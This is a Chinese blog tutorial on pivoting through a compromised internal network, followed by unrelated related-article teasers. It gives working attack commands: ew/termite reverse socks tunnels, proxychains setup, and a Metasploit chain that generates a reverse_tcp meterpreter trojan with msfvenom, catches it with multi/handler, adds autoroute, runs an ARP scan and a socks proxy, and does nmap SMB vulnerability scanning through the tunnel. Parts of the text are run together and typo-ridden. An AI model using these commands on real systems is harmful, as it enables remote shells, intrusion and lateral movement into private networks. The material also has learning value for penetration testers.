内网安全-内网穿透

目录

内网渗透

Nc使用详解

Nc监听和探测

Nc传文件

termite内网穿透工具

ssh代理内网穿透

ssh配置socket代理

MSF多级网络穿透

内网渗透

Nc使用详解
Nc监听和探测

Nc传文件

termite内网穿透工具

1、termite 之前叫ew    (可以进行正向连接,可以进行反向连接)
​
2、
靶机监听流量转发:./ew_for_linux64 -s rcsocks -l 1111 -e 2222#将1111端口监听到的本地数据转发到 web服务器的2222端口# 通过1111端口,将本地流量转发出去#rcsocks、rssocks 用于反向连接#ssocks 用于正向连接# -l 指定本地监听的端口# -e 指定要反弹到的机器端口# -d 指定要反弹到机器的IP# -f 指定要主动连接的机器 ip# -g 指定要主动连接的机器端口# -t 指定超时时长,默认为 1000root@ubuntu:/tmp# ./ew_for_linux64 -s rssocks -d lhost -e 2222
rssocks 192.168.12.128:2222 <--[10000 usec]--> socks server
​
监听机的流量转发:
#将流量通过2222端口传到192.168.16.128主机上
#rcsocks、rssocks 用于反向连接#ssocks 用于正向连接# -l 指定本地监听的端口# -e 指定要反弹到的机器端口# -d 指定要反弹到机器的IP# -f 指定要主动连接的机器 ip# -g 指定要主动连接的机器端口# -t 指定超时时长,默认为 10003、windows和linux差不多!
ssh代理内网穿透

正向代理就是利用已经控制的主机来控制更多的主机,主机可能存在内网网卡,可以通过内网穿透工具来控制内网主机! ​ 反向代理就是在本地开启一个端口,通过ssh服务把端口映射到跳板机的ssh服务器的内网ip端口上,这样内网主机就可以直接访问我们本地主机服务!
ssh配置socket代理

1、当然我们需要在 /etc/proxychains4.conf 文件里面修改代理端口
我们就可以直接使用本地流量进行攻击!┌──(root㉿ru)-[~/kali]
└─# cat /etc/proxychains4.conf | grep "socks" | tail -1
socks5  127.0.0.1 8081代理完成之后就可以使用本地流量进行内网信息收集了
MSF多级网络穿透

1、可以先控制web主机。直接生成监听木马,然后利用web主机的漏洞从而获取到meterpreter!
msfvenom -p windwos/meterpreter/reverse_tcp lhost=本地监听IP lport=本地监听端口 -f exe > shell.exe
-p:指定payload
-f:指定生成木马类型2、msfconsole 监听模块
use exploit/multi/handler
set payload windwos/meterpreter/reverse_tcp
set lhost 本地监听IP
set lport 本地监听端口  (这几个参数要和生成的木马一样!!)
在web主机上运行shell.exe即可!3、添加内网静态路由
run autoroute -s 内网IP网段
然后就可以扫描该网段了
run post/windwos/gather/arp_scanner RHOSTS=内网IP网段
当然我们也可以使用msf自带的端口扫描模块(auxiliary/scanner/portscan/tcp)4、socks5代理
如果我们想在本地使用扫描器来进行内网信息收集,我们就可以利用msf的socks5代理设置,前提是我们已经拿到了web主机的meterpreter了!
use auxiliary/server/socks_unc
set srvhost 127.0.0.1
set srvport 1234
run┌──(root㉿ru)-[~/kali]
└─# netstat -tnlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:45163         0.0.0.0:*               LISTEN      1150/containerd
tcp        0      0 0.0.0.0:1234            0.0.0.0:*               LISTEN      19399/ruby
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      1174/sshd: /usr/sbi
tcp6       0      0 :::22┌──(root㉿ru)-[~/kali]
└─# cat /etc/proxychains4.conf | grep "socks5" | tail -1
socks5  127.0.0.1 1234这样我们就搞定了
nmap:
proxychains4 nmap -sT -sV -Pn -n -p 22,80,135,139,3389,445  --script=smb-vuln-ms* 内网IP  (正向扫描)在此之后,我们再次进行msf漏洞攻击的时候就必须使用正向的payload了!











本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/679613.shtml


如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!











相关文章










OpenWrt的ssh无法登陆问题Permission denied, please try again.解决








OpenWrt的ssh无法登陆问题Permission denied, please try again.解决




OpenWrt的ssh无法登陆问题Permission denied, please try again.解决 
一、情况描述&#xff1a; 
​ 我根据B站的博主提供的教程对红米AC2100路由器进行刷机。最开始刷的Openwrt是可以连接ssh的&#xff0c;后面的升级改进版就无法进入ssh了&#xff0c;具体的错误如下。 
#采…




阅读更多...

















vue双向绑定的原理








vue双向绑定的原理




Vue双向绑定的原理主要基于数据劫持和发布-订阅模式。通过使用Object.defineProperty方法来劫持数据属性的setter和getter&#xff0c;当数据发生变化时&#xff0c;能够触发相应的监听器。 
具体来说&#xff0c;当一个组件的属性值发生变化时&#xff0c;Vue会触发一个更新函…




阅读更多...

















倒计时56天








倒计时56天




复习3-2&#xff1a;习题篇&#xff1a; 
3. 
#include<bits/stdc.h>
using namespace std;
#define int long long
const int N2e56;
const int inf 0x3f3f3f3f;
int a[1100][1100];
int b[1100][1100][4];
int n,m,q;
int dfs(int i,int j,int q)
{if(i<0||j<0||…




阅读更多...

















栈模拟递归,LeetCode 145. 二叉树的后序遍历








栈模拟递归,LeetCode 145. 二叉树的后序遍历




一、题目 
1、题目描述 给你一棵二叉树的根节点 root &#xff0c;返回其节点值的 后序遍历 。 2、接口描述 
​ 
/*** Definition for a binary tree node.* struct TreeNode {*     int val;*     TreeNode *left;*     TreeNode *right;*     TreeNode() : val(0), left(nul…




阅读更多...

















JVM学习记录








JVM学习记录




JVM基础概念 
JVM是一个运行在计算机上的程序&#xff0c;负责编译java字节码文件&#xff0c;支持跨平台特性。  java语言为了通过实时解释实现多平台支持&#xff0c;性能相对于C等语言较低&#xff0c;而JVM提供了JIT即时编译进行性能优化。 
JVM与JIT 
JVM负责解释和执行Ja…




阅读更多...

















3.10 Binance_interface APP U本位合约交易-市单价平仓








3.10 Binance_interface APP U本位合约交易-市单价平仓




Binance_interface APP U本位合约交易-市单价平仓 
Github地址PyTed量化交易研究院 
量化交易研究群(VX)  py_ted目录 Binance_interface APP U本位合约交易-市单价平仓1. APP U本位合约交易-市单价平仓函数总览2. 模型实例化3. 同步 市价平仓4. 同步 市价平仓 回调函数5. 异步…




阅读更多...

















LLaMA 入门指南








LLaMA 入门指南




LLaMA 入门指南 LLaMA 入门指南LLaMA的简介LLaMA模型的主要结构Transformer架构多层自注意力层前馈神经网络Layer Normalization和残差连接 LLaMA模型的变体Base版本Large版本Extra-Large版本 LLaMA模型的特点大规模数据训练 LLaMA模型常用数据集介绍公共数据来源已知的数据集案…




阅读更多...

















子集型回溯和组合型回溯








子集型回溯和组合型回溯




目录 
子集 
1,选或不选 
2.枚举选哪个 
组合 
1.选或不选 
2.枚举选哪个 回溯问题有两种思考方式,一种是对于给定集合的每个元素,你是选还是不选,另一种是每个位置必须选一个数,你挑一个选就行了.但这种挑选一定是有序的挑 
子集 
子集 
1,选或不选 
class Solution {
public:…




阅读更多...

















Java的接口








Java的接口




目录 
1.接口的概念 
2.语法规则 3.接口的使用 4.接口的特性 
总结&#xff1a; 
5.实现多个接口 
6.接口间的继承 1.接口的概念 
接口就是公共的行为规范标准&#xff0c;大家在实现时&#xff0c;只要符合规范标准&#xff0c;就可以通用。 在Java中&#xff0c;接口可以看成…




阅读更多...

















【for循环——讲解】








【for循环——讲解】




for循环 1. 介绍2. Python 中的 for 循环3. JavaScript 中的 for 循环4. Java 中的 for 循环5. C# 中的 for 循环6. C 中的 for 循环 1. 介绍 
for 循环是一种常见的控制结构&#xff0c;被用于在编程中重复执行一段代码固定的次数&#xff0c;或者遍历数据结构中的每个元素。大…




阅读更多...

















C语言学习(8)—— 输入输出








C语言学习(8)—— 输入输出




文件在程序中是以流的形式来操作的&#xff1a;&#xff08;1&#xff09;输入流&#xff1a;数据从数据源(文件)到程序(内存)的路径&#xff1b;&#xff08;2&#xff09;输出流&#xff1a;数据从程序(内存)到数据源(文件)的路径 
一、屏幕输入输出 
1. getchar() 和 putcha…




阅读更多...

















MOMENTUM: 1








MOMENTUM: 1




攻击机 
192.168.223.128 
目标机 
192.168.223.146 
主机发现 
nmap -sP 192.168.223.0/24 端口扫描 
nmap -sV -p- -A 192.168.223.146 开启了22 80端口 
看一下web界面 随便打开看看 发现这里有个参数id&#xff0c;sql尝试无果&#xff0c;发现写入什么&#xff0c;网页显示…




阅读更多...

















kali 开启ssh








kali 开启ssh




vi /etc/ssh/sshd_config 
PermitRootLogin yes PasswordAuthentication yes 
保存退出 
service ssh restart 
ss -tunlp Netid       State        Recv-Q       Send-Q             Local Address:Port              Peer Address:Port       Process tcp         LISTEN   …




阅读更多...

















C#,21根火柴棍问题(21 Matchticks Problem)的算法与源代码








C#,21根火柴棍问题(21 Matchticks Problem)的算法与源代码




一、21根火柴棍问题&#xff08;21 Matchticks Problem&#xff09; 
21根火柴棍问题是西方经典游戏之一。 
给定21根火柴&#xff0c;2个人A和B&#xff08;比如&#xff1a;分别是计算机和用户&#xff09;。 每个人一次可以挑选 1-- 4 根火柴。 
被迫挑最后一根火柴的人输了…




阅读更多...

















51单片机 发送信息到电脑 com3口








51单片机 发送信息到电脑 com3口




51单片机 发送信息到电脑 com3口 import serial# 打开串行端口
ser  serial.Serial(COM3, 9600)  # 9600为波特率&#xff0c;根据实际情况进行调整
flag  True
try:while True:if ser.in_waiting > 0:  # 如果串口有数据可读data  ser.read()  # 读取一行数据并解码为字符串…




阅读更多...

















第76讲安全退出实现








第76讲安全退出实现




安全退出实现 
VueX 是一个专门为 Vue.js 应用设计的状态管理构架&#xff0c;统一管理和维护各个vue组件的可变化状态(你可以理解成 vue 组件里的某些 data )。 
Vuex有五个核心概念&#xff1a; state, getters, mutations, actions, modules。 state&#xff1a;vuex的基本数…




阅读更多...

















【回溯】37. 解数独








【回溯】37. 解数独




37. 解数独 
解题思路 通过solveSudoku方法开始求解数独问题&#xff0c;然后调用backtrack方法进行递归回溯搜索。backtrack方法通过两个参数i和j来确定当前搜索的位置。  在backtrack方法中&#xff0c;首先检查当前位置是否超出了数独的边界&#xff0c;若超出&#xff0c;则…




阅读更多...

















【Java】内置锁是什么?








【Java】内置锁是什么?




内置锁&#xff08;也称为监视器锁或互斥锁&#xff09;是Java语言提供的一种基本的线程同步机制。在Java中&#xff0c;每个对象都自动持有一个内置的锁&#xff0c;这个锁也被称为对象的监视器锁&#xff08;monitor lock&#xff09;。当你使用synchronized关键字来同步一个…




阅读更多...

















arduino uno R3驱动直流减速电机(蓝牙控制)








arduino uno R3驱动直流减速电机(蓝牙控制)




此篇博客用于记录使用arduino驱动直流减速电机的过程&#xff0c;仅实现简单的功能&#xff1a;PID调速、蓝牙控制 1、直流减速电机简介2、DRV8833电机驱动模块简介3、HC-05蓝牙模块简介电机转动测试4、PID控制5、蓝牙控制电机 1、直流减速电机简介 
我在淘宝购买的电机&#x…




阅读更多...

















24个已知403绕过方法的利用脚本








24个已知403绕过方法的利用脚本




介绍 一个简单的脚本&#xff0c;仅供自用&#xff0c;用于绕过 403  在curl的帮助下使用24个已知的403绕过方法  它还可用于比较各种条件下的响应&#xff0c;如下图所示  用法 ./bypass-403.sh https://example.com admin
./bypass-403.sh website-here path-here 
安装 git …




阅读更多...


















最新文章


















Copyright @ 2022~2023